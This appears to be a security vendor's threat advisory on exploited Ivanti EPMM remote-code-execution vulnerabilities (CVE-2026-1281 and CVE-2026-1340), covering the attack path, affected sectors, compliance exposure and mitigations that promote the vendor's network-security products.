Executive Summary
In January 2026, two critical zero-day vulnerabilities, CVE-2026-1281 and CVE-2026-1340, were discovered in Ivanti Endpoint Manager Mobile (EPMM). These vulnerabilities allow unauthenticated remote code execution, enabling attackers to gain full control over mobile device management infrastructure without requiring user interaction or credentials. Exploitation activities have included establishing reverse shells, installing web shells, conducting reconnaissance, and downloading malware. Affected sectors span state and local government, healthcare, manufacturing, professional and legal services, and high technology across the United States, Germany, Australia, and Canada.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-1281 to its Known Exploited Vulnerabilities (KEV) Catalog, underscoring the severity of the threat. Threat actors are rapidly advancing their operations, moving from initial reconnaissance to deploying persistent backdoors designed to maintain long-term access, even after organizations apply patches.
Why This Matters Now
The rapid exploitation of these vulnerabilities highlights the critical need for organizations to promptly apply patches and enhance monitoring to prevent unauthorized access and potential data breaches.
Attack Path Analysis
Attackers exploited unauthenticated remote code execution vulnerabilities in Ivanti EPMM to gain initial access. They then established reverse shells and installed web shells to escalate privileges and maintain persistence. Utilizing these footholds, they conducted reconnaissance and moved laterally within the network. Command and control channels were set up to exfiltrate sensitive data. The attack culminated in the deployment of malware, leading to significant operational disruption.
Kill Chain Progression
Initial Compromise
Description
Attackers exploited unauthenticated remote code execution vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti EPMM to gain initial access.
Related CVEs
CVE-2026-1281
CVSS 9.8A code injection vulnerability in Ivanti Endpoint Manager Mobile (EPMM) allows unauthenticated remote code execution.
Affected Products:
Ivanti Endpoint Manager Mobile (EPMM) – 12.5.0.x, 12.6.0.x, 12.7.0.x, 12.5.1.0, 12.6.1.0
Exploit Status:
exploited in the wildCVE-2026-1340
CVSS 9.8A code injection vulnerability in Ivanti Endpoint Manager Mobile (EPMM) allows unauthenticated remote code execution.
Affected Products:
Ivanti Endpoint Manager Mobile (EPMM) – 12.5.0.x, 12.6.0.x, 12.7.0.x, 12.5.1.0, 12.6.1.0
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Techniques identified for SEO/filtering; may be expanded with full STIX/TAXII enrichment later.
Exploit Public-Facing Application
Command and Scripting Interpreter: Unix Shell
Server Software Component: Web Shell
Application Layer Protocol: Web Protocols
Network Service Discovery
Ingress Tool Transfer
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Asset Management
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Government Administration
Critical exposure to remote code execution vulnerabilities in Ivanti EPMM mobile device management systems, with observed exploitation targeting state and local government infrastructure requiring immediate patching.
Health Care / Life Sciences
Healthcare organizations face severe risks from unauthenticated remote code execution attacks on mobile device management platforms, potentially compromising patient data and HIPAA compliance requirements.
Computer Software/Engineering
High technology sector directly impacted by Ivanti EPMM vulnerabilities enabling reverse shells and web shell installation, threatening enterprise mobile fleet security and software development environments.
Legal Services
Professional and legal services organizations vulnerable to remote code execution attacks through mobile device management systems, risking client confidentiality and regulatory compliance across multiple jurisdictions.
Sources
- Critical Vulnerabilities in Ivanti EPMM Exploitedhttps://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/Verified
- NVD - CVE-2026-1281https://nvd.nist.gov/vuln/detail/CVE-2026-1281Verified
- NVD - CVE-2026-1340https://nvd.nist.gov/vuln/detail/CVE-2026-1340Verified
- Ivanti warns of two EPMM flaws exploited in zero-day attackshttps://www.bleepingcomputer.com/news/security/ivanti-warns-of-two-epmm-flaws-exploited-in-zero-day-attacks/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to this incident as it embeds security directly into the cloud fabric, potentially limiting the attacker's ability to move laterally and exfiltrate data.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: While initial exploitation may still occur, Aviatrix CNSF could limit the attacker's ability to escalate privileges and establish persistent access.
Control: Zero Trust Segmentation
Mitigation: Aviatrix Zero Trust Segmentation could limit the attacker's ability to escalate privileges and maintain persistence within the network.
Control: East-West Traffic Security
Mitigation: Aviatrix East-West Traffic Security could limit the attacker's ability to move laterally and conduct reconnaissance within the network.
Control: Multicloud Visibility & Control
Mitigation: Aviatrix Multicloud Visibility & Control could limit the attacker's ability to establish command and control channels for data exfiltration.
Control: Egress Security & Policy Enforcement
Mitigation: Aviatrix Egress Security & Policy Enforcement could limit the attacker's ability to exfiltrate sensitive data through command and control channels.
Aviatrix Zero Trust CNSF could limit the scope of operational disruption caused by malware deployment.
Impact at a Glance
Affected Business Functions
- Mobile Device Management
- Network Security
- User Authentication
Estimated downtime: 7 days
Estimated loss: $500,000
Potential exposure of sensitive corporate data managed through EPMM, including device configurations and user information.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust Segmentation to restrict lateral movement within the network.
- • Deploy Inline IPS (Suricata) to detect and prevent exploitation attempts.
- • Utilize Threat Detection & Anomaly Response systems to identify and respond to malicious activities.
- • Enforce Egress Security & Policy Enforcement to monitor and control outbound traffic.
- • Ensure regular patching and updates of all systems to mitigate known vulnerabilities.
